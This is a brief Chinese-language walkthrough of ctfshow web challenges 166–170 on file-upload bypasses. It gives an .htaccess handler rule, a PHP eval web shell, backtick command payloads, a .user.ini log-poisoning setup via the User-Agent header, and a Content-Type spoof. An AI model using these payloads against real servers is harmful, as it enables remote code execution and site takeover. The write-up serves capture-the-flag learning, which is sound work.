ctfshow——web入门166~170
web入门166
这题是让我们上传一个zip压缩包,然后可以下载该压缩包,下载时zip文件会进行文件包含,也就是include
首先先随便找一个文件压缩,然后记事本打开写入一句话木马
之后上传文件,点击下载文件时用bp抓包
发送给重发器
(这里如果用get提交的话是不能有空格的,我们可以用+来代替)
web入门167
上传jpg
.htaccess:
.htaccess被称为超文本入口,此文件有多个功能,其中一个功能可以改变文件扩展名,同时也可以实现文件夹密码保护、用户自动重定向、自定义错误页面等功能。
payload:
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
这个大概意思是1.jpg会被当做php文件执行
接下来我们在1.jpg文件中插入我们的恶意代码
:
<?= eval($_POST[1]);?>
然后再上传1.jpg
接着点击下载文件,复制url(如https://0f5f07f4-02dc-46b0-8a60-69556a9a1d8c.challenge.ctf.show/upload/1.jpg),蚁剑连接
web入门168
png形式
然后我们通过测试发现可以使用`
那么步骤如下:
上传文件抓包,<?=`ls ../`;?>
访问/upload/9.php
然后这次的flag再flagaa.php中
直接和上面一样
<?=`tac ../flagaa.php`?>
访问
web入门169
要求zip
这里我们还是用到.uers.ini
文件内容:auto_prepend_file=/var/log/nginx/access.log
但是:
直接这样发送,发现无法上传,文件类型错误
然后因为accept为image
所以我们还需要将Content-Type改成image/png
成功上传
然后如果我们直接访问。upload,会显示403无php文件,所以我们上传一个php文件
明显是UA,那就直接插入UA头
web入门170
这题和上题一样
上传.user.ini文件
上传php文件
成功访问: